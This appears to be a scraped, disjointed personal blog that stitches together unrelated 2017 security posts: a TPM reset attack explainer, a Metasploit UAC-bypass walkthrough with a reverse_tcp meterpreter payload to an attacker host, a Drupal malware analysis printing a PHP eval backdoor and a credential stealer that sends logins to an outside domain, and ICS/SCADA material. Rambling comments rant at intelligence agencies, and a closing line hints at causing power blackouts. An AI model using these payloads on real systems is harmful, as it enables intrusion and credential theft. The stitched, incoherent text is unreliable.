Friday, August 25, 2017

Nek - Notte di febbraio (Official Video)

TPM Reset Attack

Welcome to the TPM Reset Attack page. Here you can find information about a novel new attack against TPMs and the TCG architecture, in addition to a video demo of the attack in action. This attack was first performed by Bernhard Kauer, but we at the Dartmouth College PKI/Trust Lab have been exploring the same kind of attack, and thought it would be interesting to demonstrate and document it here. Please read this entire document before jumping to conclusions about what this attack can and cannot do. For instance, this attack cannot get an endorsement (or any other) kind of key out of a TPM and thus does not enable a random remote party to masquerade as a trusted platform, only a remote party with physical access to the TPM with the endorsment key of the trusted system in question. Also, while the basis of this attack is very simple and interesting, building on this attack to do interesting things might require both basic and sophisticated specialized hardware. Consider yourself warned.

Background

Trusted Platform Module (TPM) is an embedded cryptographic device, whose spec was designed by the Trusted Computing Group (TCG). These devices are implemented by various vendors. They are meant to be cheap, commodity devices included on new PC motherboards and are designed to enable trusted computing.
One key facility that TPMs provide to enable trusted computing is the ability to securely store a series of measurements. To do this, the TPM employs a set of registers called Platform Configuration Registers (PCRs). A TPM equipped PC with a trusted BIOS can boot up, and take a series of measurements of the hardware and software of the running machine, and store them in the PCRs. The TPM can cryptographically sign these PCRs and send them to a remote party. This party can then verify that the platform equipped with that TPM has been booted up and measured in that specific manner. TPMs also use these PCRs for the purposes of binding wrapped keys to a platform in a particular state. That is, the TPM may not allow a platform in a different state than it was when the key was created to have access to the key.
PCRs work as secure measurement storage because they support only one operation: Extend(). At initialization, all PCRs are filled with 20 NULL bytes (0x00). Normally only the BIOS sees them in this state. The BIOS will then take some measurement, and Extend() it into a specified PCR. Extend is defined as follows.

Extend(PCR#, newval) {

val[PCR#] = SHA1(val[PCR#] . newval)
}

Where '.' is the concatenation operator.
Because of SHA1 pre-image resistance, it is very difficult to come up with a 'newval' which will get val[PCR#] into a desired state given an arbitrary old val[PCR#]. Thus, it is difficult to fake that an arbitrary series of measurements has taken place.
It is worth noting that some PCRs do support a reset operation (beginning with version 1.2 TPMs), but the PCRs most commonly used to store the trusted boot sequence (the ones we are interested in attacking) do not.

The Attack

So, given everything we've seen above, it should be very difficult to fake a trusted boot process, as long as the BIOS takes the first few measurements. The critical assumption here is that the PCRs cannot be easily reset without restarting the whole platform that the TPM resides on. If an attacker is capable of monitoring the measurements sent to the PCRs by the BIOS (with, for instance a logic analyzer, see this paper), and capable of zeroing out the PCRs without restarting the machine, then she could take a platform in any configuration and put it into a 'trusted' state. So, the difficult part is getting the TPM to reset without bringing down the whole machine. It is worth mentioning that we've also looked at interposing memory and other such things to change the running system after its been measured, but due to the speed of the busses that memory and hard drives sit on, this is a tricky endeavor. Attacking a slower bus is much easier.
TPMs typically reside on the Low Pin Count (LPC) bus. The LPC bus supports a ground driven reset line. This means that when this particular line on the bus is driven to ground every device on this bus is supposed to reset. Other devices attached to this bus include the BIOS, and legacy keyboard and mouse controllers. The video below demonstrates that driving this line is indeed possible, and fairly easy to do. Please note that in the video, we are accessing the computer in question via a remote ssh session. This is because the keyboard and mouse controller get reset when we drive the reset pin, but the network card does not. More details of this attack (and others!) can be seen in my senior honors thesis: A Security Assessment of Trusted Platform Modules, Dartmouth College Computer Science Technical Report TR2007-597.

The Video!

We attack a v1.1b TPM on an IBM NetVista PC. We chose this particular TPM as a target because it resides on a daughterboard and is thus easier to access physically.

Implications

This demonstration shows that we can drive this line without significantly disturbing the running system. If an attacker really wanted to keep from disturbing the rest of the platform, they could physically isolate the TPM from the platform and drive the reset line only on the TPM . Either way, we could ultimately take a platform in an untrusted configuration and put it into a trusted one.
An attacker with a v1.1b TPM and monitored measurements in hand could easily redrive these using the TPM_Extend() command using a standard TPM driver. Note that on a v1.2 TPM, if the BIOS locality is different from the host's (in terms of LPC locality), then some hardware attached to the bus which communicates using the BIOS's locality will be needed to redrive these measurements. However, since there is no authentication mechanism on the LPC bus itself, any rogue device could do this.

New work

Bernhard Kauer has created the OSLO Bootloader to defend against these types of attacks. It employs AMD's new sk_init instruction to use a dynamic root of trust, as opposed to a static root with the BIOS. This new type of protection relies on the LPC locality features incorporated into v1.2 TPMs.
However, an attacker with physical access to the LPC bus could circumvent these protections by communicating measurements to the TPM which claim to be from the CPU in sk_init mode. 

Wednesday, August 23, 2017

TNTCrypter is a free professional tool for hashing and encrypting your files! Images

Main functions are:
  1. Text Hashing
  2. File Hashing
  3. Recursive File Hashing
  4. Text Encryption and Decryption
  5. File Encryption and Decryption
  6. Recursive File Encryption and Decryption
  7. Gzip Compression option before encrypting files
  8. Steganography Picture data Injection and Extraction
  9. Text Converting to and from Base64 strings
  10. File Comparison

Supported Algorithms:
  • Hash Algorithms: SHA512, SHA384, SHA256, SHA1, RIPEMD160, MD5, HMAC-SHA512, HMAC-SHA384, HMAC-SHA256, HMAC-SHA1, HMAC-RIPEMD160 and HMAC-MD5. Note: HMAC hash algorithms require a password.
  • Hash Outputs: HEX-Lower Case, HEX-Upper Case and Base64.
  • Encryption/Decryption Algorithms: AES-256 bit, AES-192 bit, AES-128 bit, 3DES-168 bit, 3DES-112 bit and DES-56 bit. All these algorithms require three main fields: Password, IV and salt.
  • Modes of Operation: CBC, CFB and ECB.
  • Padding Standarts: PKCS7, ISO 10126, ANSI x.923 and Zero fill/padding.
  • Encryption Outputs: Base64 string or Encrypted File.
  • Compression algorithms: Only gzip (Deflate).
  • Steganography Pictures Input: JPG, PNG, Bitmap or TIFF.
  • Steganography Pictures Output: PNG or Bitmap.
  • Converter Outputs: Plain text or Base64 string.
Graphical User Interface:
  • MDI application
  • DPI aware
  • Responsive and Resizable
  • Intuitive GUI
  • Separate thread for GUI
  • Double buffered GUI
  • Hidden secret in Menu GUI (Crazy Harry)
Other specifications:
  • Resource friendly
  • Buffer settings for tuning performance
  • Default optimal buffer size (determined by multiple tests)
  • Multithreaded Application
  • Wide compatibility
  • Embedded FAQ
  • Embedded Debugging Options
  • Drag and drop file selections are available
  • Auto-agreement with license on application startup (no anoying popups)
  • Input and output text boxes support 'Ctrl+Scroll' temporary font size adjustment
  • Comparison field for file hashing with auto removal of ' ', '-' and ':'
  • No limitation for file size (can work with files bigger than 4 GB)
  • Recursive operations for up to 10 000 files
  • Drag and drop operations for up to 10 000 files
  • Can inject up to 1 MB file or 1.5 million characters of data into a picture
  • Can inject picture files with size of up to 12 MB
  • Can extract data from picture files with size of up to 128 MB
  • The executable file size is only 4.36 MB (4,573,184 bytes)
  • This tool is written in MS C#
  • Developed by Tony Karavasilev (Тони Каравасилев)
  • Portable (no installation required)
  • Free!
DarkJPEG is a new generation open source steganography web service. It is supposed to serve people's needs for the freedom of communication even in those countries which break human rights by forcing some kind of Internet censorship or even denying to use cryptography by law. The service uses strong steganography methods to hide the very fact of hiding data among with strong cryptography methods to protect the data of being read by non-trusted groups of people.
darkjpeg - JPEG steganography web service
GITHUB.COM

good morning! Hello! welcome back to war! so as you all know when we visit NSA site, besides submask is not connected to the main network, (better saying...it is...) however if you nmap around you will find the elliptic curve...before the elliptic curve, or before..the NSA images on the site are encrypted with
Image Encryption Using Arnold Cat Map, Logistic Map, and Selective Technique
img-encrypt-decrypt - Image Encryption Using Arnold Cat Map, Logistic Map, and Selective Technique.

Tuesday, August 22, 2017

Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.
Let’s start!!
 Attacker: Kali Linux
Target: window 10
Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.
getuid
getprivs
 From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.
To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.
Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:
usr>share>metasploit_framework>modules>exploit>windows>local
 From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.
This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.
use exploit/windows/local/bypassuac_comhijack
Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp
Msf exploit (bypassuac_comhijack) > set session 2
Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20
Msf exploit (bypassuac_comhijack) > exploit
From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.
getsystem
getprivs
 Wonderful!! Attacker got system/admin authorities and privileges.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

How to install RegRipper registry data extraction tool on Linux


RegRipper is an open source forensic software used as a Windows Registry data extraction command line or GUI tool. It is written in Perl and this article will describe RegRipper command line tool installation on the Linux systems such as Debian, Ubuntu, Fedora, Centos or Redhat. For the most part, the installation process of command line tool RegRipper is OS agnostic except the part where we deal with installation pre-requisites.

https://linuxconfig.org/how-to-install-regripper-registry-data-extraction-tool-on-linux

https://github.com/keydet89/RegRipper2.8

Pre-requisites

Fist we need to install all prerequisites. Choose a relevant command below based on the Linux distribution you are running:
DEBIAN/UBUNTU
# apt-get install cpanminus make unzip wget
FEDORA
# dnf install perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which
CENTOS/REDHAT
# yum install  perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which

Installation of required libraries

The RegRipper command line tool depends on perl Parse::Win32Registry library. The following commands will take care of this pre-requisite and install this library into /usr/local/lib/rip-lib directory:
# mkdir /usr/local/lib/rip-lib
#  cpanm -l /usr/local/lib/rip-lib Parse::Win32Registry

RegRipper script installation

At this stage we are ready to install rip.pl script. The script is intended to run on MS Windows systems and as a result we need to make some small modifications. We will also include a path to the above installed Parse::Win32Registry library. Download RegRipper source code from https://regripper.googlecode.com/files/. Current version is 2.8:
#  wget -q https://regripper.googlecode.com/files/rrv2.8.zip
Extract rip.pl script:
# unzip -q rrv2.8.zip rip.pl 
Remove interpretor line and unwanted DOS new line character ^M:
 
# tail -n +2 rip.pl > rip
# perl -pi -e 'tr[\r][]d' rip
Modify script to include an interpretor relevant to your Linux system and also include library path to Parse::Win32Registry:
# sed -i "1i #!`which perl`" rip
# sed -i '2i use lib qw(/usr/local/lib/rip-lib/lib/perl5/);' rip
Install your RegRipper rip script and make it executable:
# cp rip /usr/local/bin
# chmod +x /usr/local/bin/rip

RegRipper Plugins installation

Lastly, we need to install RegRipper's Plugins.
# wget -q https://regripper.googlecode.com/files/plugins20130429.zip
# mkdir /usr/local/bin/plugins 
# unzip -q plugins20130429.zip -d /usr/local/bin/plugins
RegRipper registry data extraction tool is now installed on your system and available via rip command:
# rip
Rip v.2.8 - CLI RegRipper tool
Rip [-r Reg hive file] [-f plugin file] [-p plugin module] [-l] [-h]
Parse Windows Registry files, using either a single module, or a plugins file.

  -r Reg hive file...Registry hive file to parse
  -g ................Guess the hive file (experimental)
  -f [profile].......use the plugin file (default: plugins\plugins)
  -p plugin module...use only this module
  -l ................list all plugins
  -c ................Output list in CSV format (use with -l)
  -s system name.....Server name (TLN support)
  -u username........User name (TLN support)
  -h.................Help (print this information)
  
Ex: C:\>rip -r c:\case\system -f system
    C:\>rip -r c:\case\ntuser.dat -p userassist
    C:\>rip -l -c

All output goes to STDOUT; use redirection (ie, > or >>) to output to a file.
  
copyright 2013 Quantum Analytics Research, LLC

RegRipper command examples

Few examples using RegRipper and NTUSER.DAT registry hive file. 

List all available plugins:

$ rip -l -c
List software installed by the user:
$ rip -p listsoft -r NTUSER.DAT
Launching listsoft v.20080324
listsoft v.20080324
(NTUSER.DAT) Lists contents of user's Software key

listsoft v.20080324
List the contents of the Software key in the NTUSER.DAT hive
file, in order by LastWrite time.

Mon Dec 14 06:06:41 2015Z       Google
Mon Dec 14 05:54:33 2015Z       Microsoft
Sun Dec 29 16:44:47 2013Z       Bitstream
Sun Dec 29 16:33:11 2013Z       Adobe
Sun Dec 29 12:56:03 2013Z       Corel
Thu Dec 12 07:34:40 2013Z       Clients
Thu Dec 12 07:34:40 2013Z       Mozilla
Thu Dec 12 07:30:08 2013Z       MozillaPlugins
Thu Dec 12 07:22:34 2013Z       AppDataLow
Thu Dec 12 07:22:34 2013Z       Wow6432Node
Thu Dec 12 07:22:32 2013Z       Policies
Extract all available information using all plugins and save it to case1.txt. file:
$ for i in $( rip -l -c | grep NTUSER.DAT | cut -d , -f1 ); do rip -p $i -r NTUSER.DAT &>> case1.txt ; do

Monday, August 21, 2017

good morning worldwide! welcome back to war! so I stucked yesterday after the BACnet, thinking on air gapped SCADA protection. Today I'm starting with this first issue, DNP 3 stack that uses IP fragmentation


two layers of the OSI model are specially interesting when IP fragmentation is discussed – layer 3 (network) and layer 2 (data link). Data of the network layer is called a datagram and data of the data link layer is called a frame. From the data flow perspective – the datagram becomes included in the frame (encapsulation) and is sent to the receiver via the physical medium in the form of ones and zeros (physical layer – layer 1 of the OSI model).
It may occur that the data of the network layer might be too large to be sent over the data link layer in one piece. Then it needs to be fragmented. How much data can be sent in one frame? It is defined by the MTU (Maximum Transmission Unit) – for example MTU is 1500 bytes for the Ethernet, which is commonly used at the data link layer.
Let’s describe now how IP fragmentation actually works. We need some indication that the fragments belong to the specified datagram (please keep in mind that these fragments need to be reassembled later by the receiver). For this purpose the identification number is used – the same value is used for all fragments that are created as a result of the datagram’s fragmentation. These fragments need to be reassembled to the original datagram, but how should they be reassembled (order of fragments)? Offset is used for this purpose. How does the receiver know the number of fragments? Here the flag MF (More Fragments) is used. When MF flag is set, the system knows that the next fragment is expected. The last fragment is the one without MF flag.
To summarize: the sender chooses the size of datagram that is not greater than the MTU of attached network medium and then the process of IP fragmentation is delegated to the routers, which connect different network media with different MTUs.
There is also another approach to IP fragmentation – Path MTU Discovery. The idea is that the sender sends a probe datagram with DF (Don’t Fragment) flag set. If the router gets this probe datagram and sees that it is larger than the MTU of the attached network medium, then the problem occurs – the router has to fragment it, but the probe datagram is said not to be fragmented. Then the message about this problem is sent to the sender who interprets the answer and knows that the datagram needs to be smaller to avoid fragmentation on the way to the receiver. The sender wants to find out how large the datagram can be to avoid fragmentation by the routers. That’s why this process is called Path MTU Discovery and fragmentation in this approach is delegated to the sender. The problem with this approach is that the probe datagram might have been sent via different route than the next datagrams. As a consequence, it may turn out that the smallest MTU discovered by the sender is actually not the smallest one for the next datagrams, and the fragmentation done by routers will still be needed.
What happens when the fragment is lost? The retransmission occurs when TCP is used at the layer 4 of the OSI model (transport layer).
3. IP Fragmentation Overlapping
Let’s assume that the packet filter allows only the connections to port 80, but the attacker wants to connect to port 23. Although the packet filter is configured to block the connections to port 23, the attacker might try to use IP fragmentation overlapping to bypass the packet filter and finally connect to this port.
This attack works as follows. The packet filter might be implemented in the way that the first fragment is checked according to the implemented rules – when the connection to port 80 is seen, the packet filter accepts this fragment and forwards it to the receiver. Moreover, the packet filter may assume that the next fragments just include the data, and this is not interesting from its point of view. As a consequence, the packet filter forwards the next fragments to the receiver.
Recall at this point that the reassembling occurs when the fragments arrive to the receiver. The next fragment (as it has been said – forwarded by the packer filter) might have been specially prepared by the attacker – the carefully chosen offset has been used to overwrite the value of the destination port from the first fragment. The receiver waits for all fragments, reassembles them, and finally the connection to port of the attacker’s choice is established.
The assumption here is that the packet filter looks at the first fragment that has all the necessary information to make a decision about forwarding or denying the fragment – the other fragments are assumed not to have interesting data (from packet filter’s point of view) and are just forwarded.
How could we solve this problem? If the packet filter reassembled the fragments before making a decision (forward or deny), then the attacker would be stopped. As we can see this approach is about understanding the state or context of the traffic and is called stateful inspection (in contrast to the previously described packet filter that is stateless).

1. Introduction The process of IP fragmentation occurs when the data of the network layer is too large to be transmitted over the data link layer in one pi

Sunday, August 20, 2017

Get info from any web service or page http://oscarotero.com/embed3/demo



We recently wrote about a Drupal black-hat SEO hack that among other things redirected users coming from Google to botscache[.]com site. It hijacked the bootstrapping process via the session_inc variable in database, then made Drupal load a malicious file from the global /tmp directory instead of the standard includes/session.inc file.
This malware evolves and we have found its new variation. Again, the only malicious code that could be found within the site structure was just a file name. This time it was in the system table and it was the name of the file to load a Drupal module from. However, the file had a .jpg extension and it was loaded from a directory that belonged to a different website under the same server account ../otherwebsite/sites/default/files/slides/Search.jpg.
Taking a look at that Search.jpg file we can see the following code:


if(isset($_POST["gbdc"])){@preg_replace('/^/e','e'.'val($_POST["gbdc"])', 'add');exit;}

function drupal_get_urlsc_callback_url($url) {  
  ...
  return $file_contents;   
}

if(isset($_POST['op'])&&$_POST['op']=='Log in'){
  ...
  if(user_authenticate(@$_POST['name'],@$_POST['pass'])){
 $args_result_url=base64_decode("aHR0cDovLzB4MHguY28vcC5waHA/dT0=").base64_encode(@$_POST['name']);
 $args_result_url.="&p=".base64_encode(@$_POST['pass'])."&url="....;
 drupal_get_urlsc_callback_url($args_result_url);
  }
}

if(empty($_COOKIE) && preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
   header("location:http://botscache[.]com/n.php?".$_SERVER["HTTP_HOST"]....);
   exit;
}

if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/google4a4791b250e72fd1.html'){
    echo 'google-site-verification: google4a4791b250e72fd1.html';
    exit;
}
The functionality is pretty much the same: backdoor to execute arbitrary code, botscache[.]com redirection of the search engine traffic (Air Jordan replica spam) and malicious Google Search Console verification. However, this variation also add the functionality to steal Drupal credentials. When someone submits a login form, the malicious module verifies that the credentials are valid and sends them to their own site 0x0x[.]co (the domain name is base64-encoded).
This Drupal malware demonstrates that infection is not always limited to the site itself. You may not find anything suspicious if you scan only the site directory. The actual malware may be anywhere on the server: in publicly writable directories like /tmp and /var/tmp, inside neighbor sites that share the same server account, etc. If one of your sites is hacked, don’t limit the cleanup to this site only. You should always scan all the sites you have on the same server - all the sites may be infectedand some of them may have backdoors and malicious files lurking, leading to recurring infections.
This infection also reminds us about the importance of changing passwords after every site hack. It’s always a good idea to restrict access to CMS admin area. Two factor authentication and/or IP whitelist will stop hackers even if they managed to steal your credentials. You can do it on your own server or place your site behind a website firewall and have it block unwanted logins.
http://labs.sucuri.net/?note=2016-07-13


PHP library to get information from any web page (using oembed, opengraph, twitter-cards, scrapping the html, etc). It's compatible with any web service (youtube, vimeo, flickr, instagram, etc) and has adapters to some sites like (archive.org, github, facebook, etc).
Requirements:
  • PHP 5.5+
  • Curl library installed

SCADA SHODAN STUXNET

Good morning!!!! Welcome back to War everybody!
awesome-industrial-control-system-security tools
awesome-industrial-control-system-security - A curated list of resources related to Industrial Control System (ICS) security.
GITHUB.COM
GostoMostrar mais reações
Comentar
Comentários
GostoMostrar mais reações
Responder6 min
Gerir
Elsa David let me see what stuxnet was about Mossad----so the iranians won't die stupid thinking on infected usb...come on...DEBKAfile they are not thta stupid...let usb inside after chernobyl
GostoMostrar mais reações
Responder4 min
Gerir
Elsa David so...gentlemen...where was the vulnerabilty ? https://nmap.org/nsedoc/scripts/bacnet-info.html
Discovers and enumerates BACNet Devices collects device information based off standard requests. In…
NMAP.ORG
GostoMostrar mais reações
ResponderEliminar pré-visualização2 min
Gerir
Elsa David I'm chsing you you cinic motherfuckers US Intelligence Community...
GostoMostrar mais reações
Responder1 minEditado
Gerir

Energy Blackouts total electric outage graphite carbon balls trow 2 ground impact

  https://www.alibaba.com/product-detail/Graphite-Carbon-Ball-C80-Instead-of_1601156433008.html?spm=a2700.galleryofferlist.normal_offer.d_ti...